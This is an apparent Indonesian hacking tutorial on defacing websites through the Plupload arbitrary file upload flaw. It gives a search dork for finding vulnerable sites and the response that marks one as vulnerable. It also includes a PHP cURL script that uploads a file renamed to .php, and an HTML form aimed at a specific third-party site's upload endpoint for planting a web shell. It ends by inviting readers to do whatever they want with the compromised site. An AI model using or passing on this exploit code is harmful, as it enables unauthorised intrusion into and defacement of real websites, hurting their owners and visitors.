Yo Waz Up Gaes kali ini gua mau share tentang Deface dengan Plupload Arbitrary File Upload,Bagi yg belum tahu caranya simak aj langsung
Dork:
inurl:/plupload/examples/
selebihnya use ur brain , jangan manja ea
terus pilih salah satu website lalu masukan exploit di bawah ini
/[path]/plupload/examples/upload.php
ciri-ciri vuln ada tulisan {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Code PHP :
<?php
$url = "http://target.com/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@chaYankVica.jpg",
"name" => "chaYankVica.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
CSRF :
<html>
<body>
<form method="post" action="http://devel.movieparkholidays.atlanticmoon.com/3rdParty/plupload/1.5.1.1/examples/upload.php" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="bypas.php" />
<input type="submit" value="submit"/>
</form>
</body>
</html>
untuk csrf nya value="bypas.php" /> nama bypas.php bisa di ganti dengan nama shellmu
oke skrng bukak csrf mu dan upload shell mu
kalo shellmu dah di upload kemungkinan ada kata kata kek gini
http://devel.movieparkholidays.atlanticmoon.com/3rdParty/plupload/1.5.1.1/examples/upload.php
akses shellmu ?
[path]/plupload/examples/uploads/shell.php
h3h3 shell gua berhasil ke upload
kalo dah upload shell silahkan webnya mau kalian apain
